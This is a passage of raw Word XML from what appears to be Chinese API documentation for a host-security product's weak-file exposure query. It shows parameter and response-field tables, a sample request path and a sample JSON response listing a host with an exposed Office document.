        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0944F2DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3525D4CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07610E52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65ED5DB7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE3E223" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A670B23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E234748" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A7281E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32173613" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E313289" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverNameEq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="206C91AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001D86DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07CBD781" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名，精确查找</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BCEBF2B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F824053" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02EA7B0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787F30B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="427C762F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53FD2E51" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0588A326" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E7AA11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03743009" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B63854A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险文件类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="005DF883" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E6A960" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55FC9A72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56BDE7B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E6E812A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="059A3923" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30135B4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A2B57F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A19C286" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19484C0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口访问性：-1-未知；0-关闭；1-打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F1D128B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="088E9FDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62972125" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ADF760F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49C113B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解析方式：0-host解析；1-dns解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="695D1C89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C9CE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/weakfile/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BBD0F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C4A0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "nan.zhang",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5a5d08417d761b67a5bb712b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "portStatus": -1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "translate": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serverName": "www.zhn.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "filePath": "/home/qt/nan/test.doc",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "regexLevel": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "regexType": 8,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "regexTypeDesc": "Office文档",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "checkUrl": "http://www.zhn.com:80/test.doc",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "modifyTime": 1504234128,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "download": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1C903"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694"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5837"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="54BE924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2494E56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214EEF58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C40BBFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A78BB85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61144F24" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DFF0AD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4F6113" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4BEB9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="079B04D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="702E9620" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="632CFF07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50409F69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A306040" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE960AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="799A13D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46423C31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760BF34C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4381A019" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE7B1BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34D418AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26F744AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771224D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1B57D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A04CA5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F81B8CD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C32B84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2569472A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52DBD26D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="562473F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="765318E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E9B63CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A503BFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="231A1933" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B458D86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6670FA78" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CEF6434" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E41CB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682DB19A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C035216" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="648985E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1745BDB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698AD896" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA3CF8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5E44FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C903712" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AE319FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45687FF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
